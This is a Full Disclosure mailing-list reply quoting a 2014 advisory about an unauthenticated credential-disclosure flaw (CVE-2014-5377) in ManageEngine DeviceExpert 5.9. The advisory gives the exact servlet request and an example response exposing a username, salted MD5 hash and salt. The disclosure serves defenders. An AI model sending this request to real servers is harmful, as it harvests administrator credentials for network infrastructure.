[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <CAEDdjHc6mcmGVifJEutoB41CSyWD98asPRhjEK5L=ATqDaHbVw@mail.gmail.com>
Date: Wed, 27 Aug 2014 22:50:28 +0100
From: Pedro Ribeiro <pedrib@...il.com>
To: bugtraq <bugtraq@...urityfocus.com>, fulldisclosure@...lists.org
Subject: Re: [FD] [The ManageOwnage Series,
part II]: User credential disclosure in ManageEngine DeviceExpert
On 27 Aug 2014 19:14, "Pedro Ribeiro" <pedrib@...il.com> wrote:
>
> Hi,
>
> You can read the usernames and MD5 hashed passwords of all the users
> in the Device Expert application by sending an unauthenticated
> request.
> I am releasing this as a 0 day as ManageEngine have responded that
> they do not consider this a priority and won't fix it in the near
> future unless a customer requests it. See details below.
>
> >> User credential disclosure in ManageEngine DeviceExpert 5.9
> >> Discovered by Pedro Ribeiro (pedrib@...il.com), Agile Information
Security
> ==========================================================================
>
> >> Background on the affected product:
> "DeviceExpert is a web–based, multi vendor network change,
> configuration and compliance management (NCCCM) solution for switches,
> routers, firewalls and other network devices. Trusted by thousands of
> network administrators around the world, DeviceExpert helps automate
> and take total control of the entire life cycle of device
> configuration management."
>
>
> >> Technical details:
> Vulnerability: User credential disclosure / CVE-2014-5377
> Constraints: no authentication or any other information needed.
> Affected versions: UNFIXED as of 27/08/2014 - current version 5.9
> build 5980 is vulnerable, older versions likely vulnerable
>
> GET /ReadUsersFromMasterServlet
>
> Example response:
> <?xml version="1.0"
>
encoding="UTF-8"?><discoveryresult><discoverydata><username>admin</username><userrole>Administrator</userrole><password>Ok6/FqR5WtJY5UCLrnvjQQ==</password><emailid>
noreply@...ocorp.com
</emailid><saltvalue>12345678</saltvalue></discoverydata></discoveryresult>
>
> The passwords are a salted MD5 hash.
>
> A copy of this advisory is available at my repo:
> https://raw.githubusercontent.com/pedrib/PoC/master/me_deviceexpert-5.txt
>
> Regards,
> Pedro
To clarify, older versions are definitely vulnerable, I just don't know on
which versions the vulnerability initially appeared.
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists